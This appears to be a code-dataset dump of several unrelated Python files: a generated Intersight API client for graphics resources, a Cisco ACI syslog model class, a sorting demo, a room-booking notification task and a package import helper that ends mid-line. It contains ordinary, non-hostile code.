:param _preload_content: if False, the urllib3.HTTPResponse object will
be returned without reading/decoding response
data. Default is True.
:param _request_timeout: timeout setting for this request. If one
number provided, it will be total request
timeout. It can also be a pair (tuple) of
(connection, read) timeouts.
:return: GraphicsController
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
return self.patch_graphics_controller_with_http_info(
moid, graphics_controller, **kwargs) # noqa: E501
    def patch_graphics_controller_with_http_info(self, moid,
                                                 graphics_controller,
                                                 **kwargs):  # noqa: E501
        """Update a 'graphics.Controller' resource.  # noqa: E501

        This method makes a synchronous HTTP request by default. To make an
        asynchronous HTTP request, please pass async_req=True
        >>> thread = api.patch_graphics_controller_with_http_info(moid, graphics_controller, async_req=True)
        >>> result = thread.get()

        :param async_req bool: execute request asynchronously
        :param str moid: The unique Moid identifier of a resource instance. (required)
        :param GraphicsController graphics_controller: The 'graphics.Controller' resource to update. (required)
        :param _return_http_data_only: response data without head status code
                                       and headers
        :param _preload_content: if False, the urllib3.HTTPResponse object will
                                 be returned without reading/decoding response
                                 data. Default is True.
        :param _request_timeout: timeout setting for this request. If one
                                 number provided, it will be total request
                                 timeout. It can also be a pair (tuple) of
                                 (connection, read) timeouts.
        :return: tuple(GraphicsController, status_code(int), headers(HTTPHeaderDict))
                 If the method is called asynchronously,
                 returns the request thread.
        """
        # Snapshot the call arguments; 'kwargs' is validated and merged below.
        local_var_params = locals()

        all_params = ['moid', 'graphics_controller']  # noqa: E501
        all_params.append('async_req')
        all_params.append('_return_http_data_only')
        all_params.append('_preload_content')
        all_params.append('_request_timeout')

        # Fail fast on any keyword argument this endpoint does not accept.
        for key, val in six.iteritems(local_var_params['kwargs']):
            if key not in all_params:
                raise ApiTypeError("Got an unexpected keyword argument '%s'"
                                   " to method patch_graphics_controller" %
                                   key)
            local_var_params[key] = val
        del local_var_params['kwargs']
        # verify the required parameter 'moid' is set
        if self.api_client.client_side_validation and (
                'moid' not in local_var_params or  # noqa: E501
                local_var_params['moid'] is None):  # noqa: E501
            raise ApiValueError(
                "Missing the required parameter `moid` when calling `patch_graphics_controller`"
            )  # noqa: E501
        # verify the required parameter 'graphics_controller' is set
        if self.api_client.client_side_validation and (
                'graphics_controller' not in local_var_params or  # noqa: E501
                local_var_params['graphics_controller'] is None):  # noqa: E501
            raise ApiValueError(
                "Missing the required parameter `graphics_controller` when calling `patch_graphics_controller`"
            )  # noqa: E501

        collection_formats = {}

        # The Moid is interpolated into the '/graphics/Controllers/{Moid}' path.
        path_params = {}
        if 'moid' in local_var_params:
            path_params['Moid'] = local_var_params['moid']  # noqa: E501

        query_params = []

        header_params = {}

        form_params = []
        local_var_files = {}

        # The resource payload is serialized as the PATCH request body.
        body_params = None
        if 'graphics_controller' in local_var_params:
            body_params = local_var_params['graphics_controller']
        # HTTP header `Accept`
        header_params['Accept'] = self.api_client.select_header_accept(
            ['application/json'])  # noqa: E501

        # HTTP header `Content-Type`
        header_params[
            'Content-Type'] = self.api_client.select_header_content_type(  # noqa: E501
                ['application/json',
                 'application/json-patch+json'])  # noqa: E501

        # Authentication setting
        auth_settings = ['cookieAuth', 'oAuth2']  # noqa: E501

        # Delegate the HTTP exchange (auth, serialization and the optional
        # async thread) to the shared ApiClient.
        return self.api_client.call_api(
            '/graphics/Controllers/{Moid}',
            'PATCH',
            path_params,
            query_params,
            header_params,
            body=body_params,
            post_params=form_params,
            files=local_var_files,
            response_type='GraphicsController',  # noqa: E501
            auth_settings=auth_settings,
            async_req=local_var_params.get('async_req'),
            _return_http_data_only=local_var_params.get(
                '_return_http_data_only'),  # noqa: E501
            _preload_content=local_var_params.get('_preload_content', True),
            _request_timeout=local_var_params.get('_request_timeout'),
            collection_formats=collection_formats)
def update_graphics_card(self, moid, graphics_card,
**kwargs): # noqa: E501
"""Update a 'graphics.Card' resource. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.update_graphics_card(moid, graphics_card, async_req=True)
>>> result = thread.get()
:param async_req bool: execute request asynchronously
:param str moid: The unique Moid identifier of a resource instance. (required)
:param GraphicsCard graphics_card: The 'graphics.Card' resource to update. (required)
:param _preload_content: if False, the urllib3.HTTPResponse object will
be returned without reading/decoding response
data. Default is True.
:param _request_timeout: timeout setting for this request. If one
number provided, it will be total request
timeout. It can also be a pair (tuple) of
(connection, read) timeouts.
:return: GraphicsCard
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
return self.update_graphics_card_with_http_info(
moid, graphics_card, **kwargs) # noqa: E501
    def update_graphics_card_with_http_info(self, moid, graphics_card,
                                            **kwargs):  # noqa: E501
        """Update a 'graphics.Card' resource.  # noqa: E501

        This method makes a synchronous HTTP request by default. To make an
        asynchronous HTTP request, please pass async_req=True
        >>> thread = api.update_graphics_card_with_http_info(moid, graphics_card, async_req=True)
        >>> result = thread.get()

        :param async_req bool: execute request asynchronously
        :param str moid: The unique Moid identifier of a resource instance. (required)
        :param GraphicsCard graphics_card: The 'graphics.Card' resource to update. (required)
        :param _return_http_data_only: response data without head status code
                                       and headers
        :param _preload_content: if False, the urllib3.HTTPResponse object will
                                 be returned without reading/decoding response
                                 data. Default is True.
        :param _request_timeout: timeout setting for this request. If one
                                 number provided, it will be total request
                                 timeout. It can also be a pair (tuple) of
                                 (connection, read) timeouts.
        :return: tuple(GraphicsCard, status_code(int), headers(HTTPHeaderDict))
                 If the method is called asynchronously,
                 returns the request thread.
        """
        # Snapshot the call arguments; 'kwargs' is validated and merged below.
        local_var_params = locals()

        all_params = ['moid', 'graphics_card']  # noqa: E501
        all_params.append('async_req')
        all_params.append('_return_http_data_only')
        all_params.append('_preload_content')
        all_params.append('_request_timeout')

        # Fail fast on any keyword argument this endpoint does not accept.
        for key, val in six.iteritems(local_var_params['kwargs']):
            if key not in all_params:
                raise ApiTypeError("Got an unexpected keyword argument '%s'"
                                   " to method update_graphics_card" % key)
            local_var_params[key] = val
        del local_var_params['kwargs']
        # verify the required parameter 'moid' is set
        if self.api_client.client_side_validation and (
                'moid' not in local_var_params or  # noqa: E501
                local_var_params['moid'] is None):  # noqa: E501
            raise ApiValueError(
                "Missing the required parameter `moid` when calling `update_graphics_card`"
            )  # noqa: E501
        # verify the required parameter 'graphics_card' is set
        if self.api_client.client_side_validation and (
                'graphics_card' not in local_var_params or  # noqa: E501
                local_var_params['graphics_card'] is None):  # noqa: E501
            raise ApiValueError(
                "Missing the required parameter `graphics_card` when calling `update_graphics_card`"
            )  # noqa: E501

        collection_formats = {}

        # The Moid is interpolated into the '/graphics/Cards/{Moid}' path.
        path_params = {}
        if 'moid' in local_var_params:
            path_params['Moid'] = local_var_params['moid']  # noqa: E501

        query_params = []

        header_params = {}

        form_params = []
        local_var_files = {}

        # The resource payload is serialized as the request body.
        body_params = None
        if 'graphics_card' in local_var_params:
            body_params = local_var_params['graphics_card']
        # HTTP header `Accept`
        header_params['Accept'] = self.api_client.select_header_accept(
            ['application/json'])  # noqa: E501

        # HTTP header `Content-Type`
        header_params[
            'Content-Type'] = self.api_client.select_header_content_type(  # noqa: E501
                ['application/json',
                 'application/json-patch+json'])  # noqa: E501

        # Authentication setting
        auth_settings = ['cookieAuth', 'oAuth2']  # noqa: E501

        # Note: the Intersight API issues a full update as POST to the
        # instance URL (the merge-style variant uses PATCH instead).
        return self.api_client.call_api(
            '/graphics/Cards/{Moid}',
            'POST',
            path_params,
            query_params,
            header_params,
            body=body_params,
            post_params=form_params,
            files=local_var_files,
            response_type='GraphicsCard',  # noqa: E501
            auth_settings=auth_settings,
            async_req=local_var_params.get('async_req'),
            _return_http_data_only=local_var_params.get(
                '_return_http_data_only'),  # noqa: E501
            _preload_content=local_var_params.get('_preload_content', True),
            _request_timeout=local_var_params.get('_request_timeout'),
            collection_formats=collection_formats)
def update_graphics_controller(self, moid, graphics_controller,
**kwargs): # noqa: E501
"""Update a 'graphics.Controller' resource. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.update_graphics_controller(moid, graphics_controller, async_req=True)
>>> result = thread.get()
:param async_req bool: execute request asynchronously
:param str moid: The unique Moid identifier of a resource instance. (required)
:param GraphicsController graphics_controller: The 'graphics.Controller' resource to update. (required)
:param _preload_content: if False, the urllib3.HTTPResponse object will
be returned without reading/decoding response
data. Default is True.
:param _request_timeout: timeout setting for this request. If one
number provided, it will be total request
timeout. It can also be a pair (tuple) of
(connection, read) timeouts.
:return: GraphicsController
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
return self.update_graphics_controller_with_http_info(
moid, graphics_controller, **kwargs) # noqa: E501
    def update_graphics_controller_with_http_info(self, moid,
                                                  graphics_controller,
                                                  **kwargs):  # noqa: E501
        """Update a 'graphics.Controller' resource.  # noqa: E501

        This method makes a synchronous HTTP request by default. To make an
        asynchronous HTTP request, please pass async_req=True
        >>> thread = api.update_graphics_controller_with_http_info(moid, graphics_controller, async_req=True)
        >>> result = thread.get()

        :param async_req bool: execute request asynchronously
        :param str moid: The unique Moid identifier of a resource instance. (required)
        :param GraphicsController graphics_controller: The 'graphics.Controller' resource to update. (required)
        :param _return_http_data_only: response data without head status code
                                       and headers
        :param _preload_content: if False, the urllib3.HTTPResponse object will
                                 be returned without reading/decoding response
                                 data. Default is True.
        :param _request_timeout: timeout setting for this request. If one
                                 number provided, it will be total request
                                 timeout. It can also be a pair (tuple) of
                                 (connection, read) timeouts.
        :return: tuple(GraphicsController, status_code(int), headers(HTTPHeaderDict))
                 If the method is called asynchronously,
                 returns the request thread.
        """
        # Snapshot the call arguments; 'kwargs' is validated and merged below.
        local_var_params = locals()

        all_params = ['moid', 'graphics_controller']  # noqa: E501
        all_params.append('async_req')
        all_params.append('_return_http_data_only')
        all_params.append('_preload_content')
        all_params.append('_request_timeout')

        # Fail fast on any keyword argument this endpoint does not accept.
        for key, val in six.iteritems(local_var_params['kwargs']):
            if key not in all_params:
                raise ApiTypeError("Got an unexpected keyword argument '%s'"
                                   " to method update_graphics_controller" %
                                   key)
            local_var_params[key] = val
        del local_var_params['kwargs']
        # verify the required parameter 'moid' is set
        if self.api_client.client_side_validation and (
                'moid' not in local_var_params or  # noqa: E501
                local_var_params['moid'] is None):  # noqa: E501
            raise ApiValueError(
                "Missing the required parameter `moid` when calling `update_graphics_controller`"
            )  # noqa: E501
        # verify the required parameter 'graphics_controller' is set
        if self.api_client.client_side_validation and (
                'graphics_controller' not in local_var_params or  # noqa: E501
                local_var_params['graphics_controller'] is None):  # noqa: E501
            raise ApiValueError(
                "Missing the required parameter `graphics_controller` when calling `update_graphics_controller`"
            )  # noqa: E501

        collection_formats = {}

        # The Moid is interpolated into the '/graphics/Controllers/{Moid}' path.
        path_params = {}
        if 'moid' in local_var_params:
            path_params['Moid'] = local_var_params['moid']  # noqa: E501

        query_params = []

        header_params = {}

        form_params = []
        local_var_files = {}

        # The resource payload is serialized as the request body.
        body_params = None
        if 'graphics_controller' in local_var_params:
            body_params = local_var_params['graphics_controller']
        # HTTP header `Accept`
        header_params['Accept'] = self.api_client.select_header_accept(
            ['application/json'])  # noqa: E501

        # HTTP header `Content-Type`
        header_params[
            'Content-Type'] = self.api_client.select_header_content_type(  # noqa: E501
                ['application/json',
                 'application/json-patch+json'])  # noqa: E501

        # Authentication setting
        auth_settings = ['cookieAuth', 'oAuth2']  # noqa: E501

        # Note: the Intersight API issues a full update as POST to the
        # instance URL (the merge-style variant uses PATCH instead).
        return self.api_client.call_api(
            '/graphics/Controllers/{Moid}',
            'POST',
            path_params,
            query_params,
            header_params,
            body=body_params,
            post_params=form_params,
            files=local_var_files,
            response_type='GraphicsController',  # noqa: E501
            auth_settings=auth_settings,
            async_req=local_var_params.get('async_req'),
            _return_http_data_only=local_var_params.get(
                '_return_http_data_only'),  # noqa: E501
            _preload_content=local_var_params.get('_preload_content', True),
            _request_timeout=local_var_params.get('_request_timeout'),
            collection_formats=collection_formats)
|
[
"[email protected]"
] | |
c11bc856f2ea6a25f92cda9810b7bb119e56cd2a
|
24fe1f54fee3a3df952ca26cce839cc18124357a
|
/servicegraph/lib/python2.7/site-packages/acimodel-4.0_3d-py2.7.egg/cobra/modelimpl/syslog/deststate.py
|
94dfe225d2349b2697c4c964c150c674e036028f
|
[] |
no_license
|
aperiyed/servicegraph-cloudcenter
|
4b8dc9e776f6814cf07fe966fbd4a3481d0f45ff
|
9eb7975f2f6835e1c0528563a771526896306392
|
refs/heads/master
| 2023-05-10T17:27:18.022381 | 2020-01-20T09:18:28 | 2020-01-20T09:18:28 | 235,065,676 | 0 | 0 | null | 2023-05-01T21:19:14 | 2020-01-20T09:36:37 |
Python
|
UTF-8
|
Python
| false | false | 7,070 |
py
|
# coding=UTF-8
# **********************************************************************
# Copyright (c) 2013-2019 Cisco Systems, Inc. All rights reserved
# written by zen warriors, do not modify!
# **********************************************************************
from cobra.mit.meta import ClassMeta
from cobra.mit.meta import StatsClassMeta
from cobra.mit.meta import CounterMeta
from cobra.mit.meta import PropMeta
from cobra.mit.meta import Category
from cobra.mit.meta import SourceRelationMeta
from cobra.mit.meta import NamedSourceRelationMeta
from cobra.mit.meta import TargetRelationMeta
from cobra.mit.meta import DeploymentPathMeta, DeploymentCategory
from cobra.model.category import MoCategory, PropCategory, CounterCategory
from cobra.mit.mo import Mo
# ##################################################
class DestState(Mo):
    """Operational state of a syslog remote destination.

    Read-only managed object (child of syslog.RemoteDest) describing the
    resolved IP, VRF, delivery state and message counters of a configured
    syslog destination. Generated model metadata; the fix below only
    corrects the misspelled 'totalDroppedMsgs' label ("drooped" -> "dropped").
    """

    meta = ClassMeta("cobra.model.syslog.DestState")

    meta.moClassName = "syslogDestState"
    meta.rnFormat = "destst-%(name)s"
    meta.category = MoCategory.REGULAR
    meta.label = "syslog Destination State"
    meta.writeAccessMask = 0x1
    meta.readAccessMask = 0x800000000000001
    meta.isDomainable = False
    meta.isReadOnly = True
    meta.isConfigurable = False
    meta.isDeletable = False
    meta.isContextRoot = False

    # Children: faults, health score, per-destination buffered log messages.
    meta.childClasses.add("cobra.model.fault.Inst")
    meta.childClasses.add("cobra.model.fault.Counts")
    meta.childClasses.add("cobra.model.health.Inst")
    meta.childClasses.add("cobra.model.fault.Delegate")
    meta.childClasses.add("cobra.model.syslog.LogMsg")

    meta.childNamesAndRnPrefix.append(("cobra.model.fault.Counts", "fltCnts"))
    meta.childNamesAndRnPrefix.append(("cobra.model.fault.Inst", "fault-"))
    meta.childNamesAndRnPrefix.append(("cobra.model.health.Inst", "health"))
    meta.childNamesAndRnPrefix.append(("cobra.model.syslog.LogMsg", "msg-"))
    meta.childNamesAndRnPrefix.append(("cobra.model.fault.Delegate", "fd-"))

    meta.parentClasses.add("cobra.model.syslog.RemoteDest")

    meta.superClasses.add("cobra.model.naming.NamedObject")
    meta.superClasses.add("cobra.model.pol.Obj")
    meta.superClasses.add("cobra.model.pol.Comp")

    meta.rnPrefixes = [
        ('destst-', True),
    ]

    prop = PropMeta("str", "childAction", "childAction", 4, PropCategory.CHILD_ACTION)
    prop.label = "None"
    prop.isImplicit = True
    prop.isAdmin = True
    prop._addConstant("deleteAll", "deleteall", 16384)
    prop._addConstant("deleteNonPresent", "deletenonpresent", 8192)
    prop._addConstant("ignore", "ignore", 4096)
    meta.props.add("childAction", prop)

    prop = PropMeta("str", "descr", "descr", 5582, PropCategory.REGULAR)
    prop.label = "Description"
    prop.isConfig = True
    prop.isAdmin = True
    prop.range = [(0, 128)]
    prop.regex = ['[a-zA-Z0-9\\!#$%()*,-./:;@ _{|}~?&+]+']
    meta.props.add("descr", prop)

    prop = PropMeta("str", "dn", "dn", 1, PropCategory.DN)
    prop.label = "None"
    prop.isDn = True
    prop.isImplicit = True
    prop.isAdmin = True
    prop.isCreateOnly = True
    meta.props.add("dn", prop)

    # Resolved address (or hostname) of the remote syslog collector.
    prop = PropMeta("str", "ip", "ip", 16267, PropCategory.REGULAR)
    prop.label = "ip address"
    prop.isImplicit = True
    prop.isAdmin = True
    prop.regex = ['^(?=.{0,255}$)[0-9A-Za-z:\\[\\]](\\[{0,1})(?:(?:[0-9A-Za-z]|-|:){0,61}[0-9A-Za-z])?(?:\\.[0-9A-Za-z](?:(?:[0-9A-Za-z]|-|:){0,61}[0-9A-Za-z])?)*\\.?(\\]{0,1})$']
    meta.props.add("ip", prop)

    prop = PropMeta("str", "lcOwn", "lcOwn", 9, PropCategory.REGULAR)
    prop.label = "None"
    prop.isImplicit = True
    prop.isAdmin = True
    prop.defaultValue = 0
    prop.defaultValueStr = "local"
    prop._addConstant("implicit", "implicit", 4)
    prop._addConstant("local", "local", 0)
    prop._addConstant("policy", "policy", 1)
    prop._addConstant("replica", "replica", 2)
    prop._addConstant("resolveOnBehalf", "resolvedonbehalf", 3)
    meta.props.add("lcOwn", prop)

    prop = PropMeta("str", "modTs", "modTs", 7, PropCategory.REGULAR)
    prop.label = "None"
    prop.isImplicit = True
    prop.isAdmin = True
    prop.defaultValue = 0
    prop.defaultValueStr = "never"
    prop._addConstant("never", "never", 0)
    meta.props.add("modTs", prop)

    prop = PropMeta("str", "monPolDn", "monPolDn", 16273, PropCategory.REGULAR)
    prop.label = "Monitoring policy attached to this observable object"
    prop.isImplicit = True
    prop.isAdmin = True
    meta.props.add("monPolDn", prop)

    # Naming property: forms the RN as "destst-<name>".
    prop = PropMeta("str", "name", "name", 16268, PropCategory.REGULAR)
    prop.label = "Name"
    prop.isConfig = True
    prop.isAdmin = True
    prop.isCreateOnly = True
    prop.isNaming = True
    prop.range = [(1, 64)]
    prop.regex = ['[a-zA-Z0-9_.:-]+']
    meta.props.add("name", prop)

    prop = PropMeta("str", "nameAlias", "nameAlias", 28417, PropCategory.REGULAR)
    prop.label = "Name alias"
    prop.isConfig = True
    prop.isAdmin = True
    prop.range = [(0, 63)]
    prop.regex = ['[a-zA-Z0-9_.-]+']
    meta.props.add("nameAlias", prop)

    prop = PropMeta("str", "operState", "operState", 16265, PropCategory.REGULAR)
    prop.label = "None"
    prop.isImplicit = True
    prop.isAdmin = True
    prop.defaultValue = 0
    prop.defaultValueStr = "unknown"
    prop._addConstant("available", "available", 1)
    prop._addConstant("errored", "errored", 2)
    prop._addConstant("unknown", "unknown", 0)
    meta.props.add("operState", prop)

    prop = PropMeta("str", "rn", "rn", 2, PropCategory.RN)
    prop.label = "None"
    prop.isRn = True
    prop.isImplicit = True
    prop.isAdmin = True
    prop.isCreateOnly = True
    meta.props.add("rn", prop)

    prop = PropMeta("str", "status", "status", 3, PropCategory.STATUS)
    prop.label = "None"
    prop.isImplicit = True
    prop.isAdmin = True
    prop._addConstant("created", "created", 2)
    prop._addConstant("deleted", "deleted", 8)
    prop._addConstant("modified", "modified", 4)
    meta.props.add("status", prop)

    prop = PropMeta("str", "totalBufferedMsgs", "totalBufferedMsgs", 17622, PropCategory.REGULAR)
    prop.label = "total buffered messages"
    prop.isImplicit = True
    prop.isAdmin = True
    meta.props.add("totalBufferedMsgs", prop)

    prop = PropMeta("str", "totalDroppedMsgs", "totalDroppedMsgs", 17623, PropCategory.REGULAR)
    # Fixed label typo: was "total drooped messages".
    prop.label = "total dropped messages"
    prop.isImplicit = True
    prop.isAdmin = True
    meta.props.add("totalDroppedMsgs", prop)

    prop = PropMeta("str", "vrfId", "vrfId", 16266, PropCategory.REGULAR)
    prop.label = "None"
    prop.isImplicit = True
    prop.isAdmin = True
    meta.props.add("vrfId", prop)

    meta.namingProps.append(getattr(meta.props, "name"))

    # Deployment Meta
    meta.deploymentQuery = True
    meta.deploymentType = "Ancestor"

    def __init__(self, parentMoOrDn, name, markDirty=True, **creationProps):
        """Create the MO under *parentMoOrDn*, named by the required *name*."""
        namingVals = [name]
        Mo.__init__(self, parentMoOrDn, markDirty, *namingVals, **creationProps)
# End of package file
# ##################################################
|
[
"[email protected]"
] | |
c3b4cb6c2d7cbc8e5894e89e5b6a4b7727329f4d
|
80810054516ddc3fd93e916de4bf7e3e07d871b0
|
/1-books/book6_Python核心编程(第3版)/网络编程/functools_cmp_to_key.py
|
d16e6e1763906c6fdd78baf903356b25293a6ea7
|
[] |
no_license
|
TinyHandsome/BookStudy
|
df9ca668f2dd1b51b1e364c22bc531394a03eeae
|
69c9018bb70893f74a44e4df9f3d3e39467de3f6
|
refs/heads/master
| 2023-09-04T03:06:43.918259 | 2023-09-01T04:27:01 | 2023-09-01T04:27:01 | 184,217,837 | 18 | 17 | null | null | null | null |
UTF-8
|
Python
| false | false | 218 |
py
|
# Demo: key-based sorting vs. classic two-argument comparators.
from functools import cmp_to_key

x = ['hello', 'world', 'ni']
x.sort(key=len)  # in-place, shortest string first
print(x)

ll = [9, 2, 23, 1, 2]
# cmp_to_key adapts an old-style cmp(a, b) comparator into a key function.
print(sorted(ll, key=cmp_to_key(lambda a, b: b - a)))  # descending
print(sorted(ll, key=cmp_to_key(lambda a, b: a - b)))  # ascending
|
[
"[email protected]"
] | |
1ec7f1e63501bcd0990480bde271f6da0909fd06
|
20f951bd927e4e5cde8ef7781813fcf0d51cc3ea
|
/fossir/modules/rb/tasks.py
|
a602ffdd2659a0af0aad35e4d26284196c247028
|
[] |
no_license
|
HodardCodeclub/SoftwareDevelopment
|
60a0fbab045cb1802925d4dd5012d5b030c272e0
|
6300f2fae830c0c2c73fe0afd9c684383bce63e5
|
refs/heads/master
| 2021-01-20T00:30:02.800383 | 2018-04-27T09:28:25 | 2018-04-27T09:28:25 | 101,277,325 | 0 | 2 | null | null | null | null |
UTF-8
|
Python
| false | false | 5,611 |
py
|
from __future__ import unicode_literals
from datetime import date, datetime
from itertools import groupby
from operator import attrgetter
from celery.schedules import crontab
from sqlalchemy.orm import contains_eager
from fossir.core.celery import celery
from fossir.core.config import config
from fossir.core.db import db
from fossir.modules.rb import logger, rb_settings
from fossir.modules.rb.models.reservation_occurrences import ReservationOccurrence
from fossir.modules.rb.models.reservations import RepeatFrequency, Reservation
from fossir.modules.rb.models.rooms import Room
from fossir.modules.rb.notifications.reservation_occurrences import notify_upcoming_occurrences
from fossir.util.console import cformat
def _make_occurrence_date_filter():
    """Build a SQLAlchemy filter selecting occurrences whose notification is due today.

    The lead time (days before the occurrence) comes from the room when set,
    falling back to the global settings; weekly and monthly repetitions each
    use their own value.
    """
    _default = rb_settings.get('notification_before_days')
    _default_weekly = rb_settings.get('notification_before_days_weekly')
    _default_monthly = rb_settings.get('notification_before_days_monthly')
    # Per-room override, keyed on the reservation's repeat frequency.
    notification_before_days_room = db.case({RepeatFrequency.WEEK.value: Room.notification_before_days_weekly,
                                             RepeatFrequency.MONTH.value: Room.notification_before_days_monthly},
                                            else_=Room.notification_before_days, value=Reservation.repeat_frequency)
    # Settings-level default, likewise keyed on the repeat frequency.
    notification_before_days_default = db.case({RepeatFrequency.WEEK.value: _default_weekly,
                                                RepeatFrequency.MONTH.value: _default_monthly},
                                               else_=_default, value=Reservation.repeat_frequency)
    # Room value wins when present; otherwise use the settings default.
    notification_before_days = db.func.coalesce(notification_before_days_room, notification_before_days_default)
    days_until_occurrence = db.cast(ReservationOccurrence.start_dt, db.Date) - date.today()
    return days_until_occurrence == notification_before_days
def _print_occurrences(user, occurrences, _defaults={}, _overrides={}):
    # Debug-only pretty-printer for the occurrences *user* would be notified
    # about.  The mutable default arguments are deliberate: they act as
    # module-lifetime caches populated on the first call.
    if not _defaults or not _overrides:
        _defaults.update({RepeatFrequency.WEEK: rb_settings.get('notification_before_days_weekly'),
                          RepeatFrequency.MONTH: rb_settings.get('notification_before_days_monthly'),
                          RepeatFrequency.NEVER: rb_settings.get('notification_before_days'),
                          RepeatFrequency.DAY: rb_settings.get('notification_before_days')})
        _overrides.update({RepeatFrequency.WEEK: lambda r: r.notification_before_days_weekly,
                           RepeatFrequency.MONTH: lambda r: r.notification_before_days_monthly,
                           RepeatFrequency.NEVER: lambda r: r.notification_before_days,
                           RepeatFrequency.DAY: lambda r: r.notification_before_days})
    # NOTE: Python 2 print statements -- this module predates Python 3.
    print cformat('%{grey!}*** {} ({}) ***').format(user.full_name, user.email)
    for occ in occurrences:
        default = _defaults[occ.reservation.repeat_frequency]
        override = _overrides[occ.reservation.repeat_frequency](occ.reservation.room)
        # Room-level override wins over the settings default when present.
        days = default if override is None else override
        days_until = (occ.start_dt.date() - date.today()).days
        print cformat(' * %{yellow}{}%{reset} %{green}{:5}%{reset} {} {} {} \t %{blue!}{}%{reset} {} ({})').format(
            occ.start_dt.date(), occ.reservation.repeat_frequency.name,
            days,
            default if override is not None and override != default else ' ',
            days_until,
            occ.reservation.id,
            occ.reservation.room.full_name,
            occ.reservation.room.id
        )
def _notify_occurrences(user, occurrences):
    """Email *user* about the given occurrences and flag them as notified."""
    notify_upcoming_occurrences(user, occurrences)
    for occ in occurrences:
        occ.notification_sent = True
        # For daily repetitions one email covers the whole series, so mark
        # every remaining future occurrence of the reservation as notified.
        if occ.reservation.repeat_frequency == RepeatFrequency.DAY:
            future_occurrences_query = (occ.reservation.occurrences
                                        .filter(ReservationOccurrence.start_dt >= datetime.now()))
            future_occurrences_query.update({'notification_sent': True})
@celery.periodic_task(name='roombooking_occurrences', run_every=crontab(minute='15', hour='8'))
def roombooking_occurrences(debug=False):
    """Daily task: notify users about their upcoming room-booking occurrences.

    :param debug: if True, only print what would be sent instead of emailing
                  users and committing the ``notification_sent`` flags
    """
    if not config.ENABLE_ROOMBOOKING:
        logger.info('Notifications not sent because room booking is disabled')
        return
    if not rb_settings.get('notifications_enabled'):
        logger.info('Notifications not sent because they are globally disabled')
        return
    # Occurrences whose notification is due today (see
    # _make_occurrence_date_filter), ordered so they can be grouped per user.
    occurrences = (ReservationOccurrence.query
                   .join(ReservationOccurrence.reservation)
                   .join(Reservation.room)
                   .filter(Room.is_active,
                           Room.notifications_enabled,
                           Reservation.is_accepted,
                           Reservation.booked_for_id.isnot(None),
                           ReservationOccurrence.is_valid,
                           ReservationOccurrence.start_dt >= datetime.now(),
                           ~ReservationOccurrence.notification_sent,
                           _make_occurrence_date_filter())
                   .order_by(Reservation.booked_for_id, ReservationOccurrence.start_dt, Room.id)
                   .options(contains_eager('reservation').contains_eager('room'))
                   .all())
    for user, user_occurrences in groupby(occurrences, key=attrgetter('reservation.booked_for_user')):
        user_occurrences = list(user_occurrences)
        if debug:
            _print_occurrences(user, user_occurrences)
        else:
            _notify_occurrences(user, user_occurrences)
    if not debug:
        db.session.commit()
|
[
"[email protected]"
] | |
71017d23dc19d08ded41fb88369fda81d0999bc6
|
95565fbf6c2418e3a9e4e43e3982da0220dd6881
|
/satella/imports.py
|
b129afaeeb284639221004d7a9e78a638590461a
|
[
"MIT",
"LicenseRef-scancode-unknown-license-reference"
] |
permissive
|
piotrmaslanka/satella
|
6adc649bcbcd3ba596650f9c0bfca15cb0ec3a96
|
8dd3d4741c11717f9473b7fdc4b242dfcade7aa9
|
refs/heads/develop
| 2023-06-23T03:38:19.810958 | 2023-06-08T16:11:39 | 2023-06-08T16:11:39 | 7,431,872 | 14 | 1 |
MIT
| 2023-01-07T22:14:14 | 2013-01-03T23:02:52 |
Python
|
UTF-8
|
Python
| false | false | 4,079 |
py
|
import importlib
import os
import pkgutil
import typing as tp
import warnings
__all__ = ['import_from', 'import_class']
def import_class(path: str) -> type:
    """Resolve a dotted path (e.g. ``subprocess.Popen``) to the object it names.

    :param path: fully qualified name: module path plus attribute name
    :return: the imported class
    :raises ImportError: if the module has no attribute of that name
    """
    module_path, _, class_name = path.rpartition('.')
    try:
        return getattr(importlib.import_module(module_path), class_name)
    except AttributeError:
        raise ImportError('%s not found in %s' % (class_name, module_path))
def import_from(path: tp.List[str], package_prefix: str, all_: tp.List[str],
                locals_: tp.Dict[str, tp.Any], recursive: bool = True,
                fail_on_attributerror: bool = True, create_all: bool = True,
                skip_single_underscores: bool = True,
                skip_not_having_all: bool = False) -> None:
    """
    Import everything from a given module. Append these module's all to.

    This will examine __all__ of given module (if it has any, else it will just import everything
    from it, which is probably a bad practice and will heavily pollute the namespace.

    As a side effect, this will equip all of your packages with __all__.

    :param path: module's __path__
    :param package_prefix: package prefix to import from. Use __name__
    :param all_: module's __all__ to append to
    :param recursive: whether to import packages as well
    :param fail_on_attributerror: whether to fail if a module reports something in their __all__
        that is physically not there (ie. getattr() raised AttributeError
    :param locals_: module's locals, obtain them by calling locals() in importing module's context
    :param create_all: whether to create artificial __all__'s for modules that don't have them
    :param skip_single_underscores: whether to refrain from importing things that are preceded with
        a single underscore. Pertains to modules, as well as items
    :param skip_not_having_all: skip module's not having an __all__ entry
    :raise AttributeError: module's __all__ contained entry that was not in this module
    """
    for importer, modname, is_pkg in pkgutil.walk_packages(path, onerror=lambda x: None):
        if recursive and is_pkg:
            if modname.startswith('_') and skip_single_underscores:
                continue
            module = importlib.import_module(package_prefix + '.' + modname)
            try:
                mod_all = module.__all__
            except AttributeError:
                if skip_not_having_all:
                    continue
                mod_all = []
                if create_all:
                    # Equip the subpackage with an (initially empty) __all__.
                    module.__all__ = mod_all
            # Recurse into the subpackage so its own __all__ gets populated.
            # Fix: a stray trailing comma used to wrap this call in a
            # discarded 1-tuple; it has been removed.
            import_from([os.path.join(path[0], modname)], package_prefix + '.' + modname, mod_all,
                        module.__dict__, recursive=recursive,
                        fail_on_attributerror=fail_on_attributerror, create_all=create_all,
                        skip_not_having_all=skip_not_having_all,
                        skip_single_underscores=skip_single_underscores)
            locals_[modname] = module
            if modname not in all_:
                all_.append(modname)
        elif not is_pkg:
            module = importlib.import_module(package_prefix + '.' + modname)
            try:
                package_ref = module.__all__
            except AttributeError:
                # No __all__: fall back to enumerating the module's namespace.
                warnings.warn('Module %s does not contain __all__, enumerating it instead' %
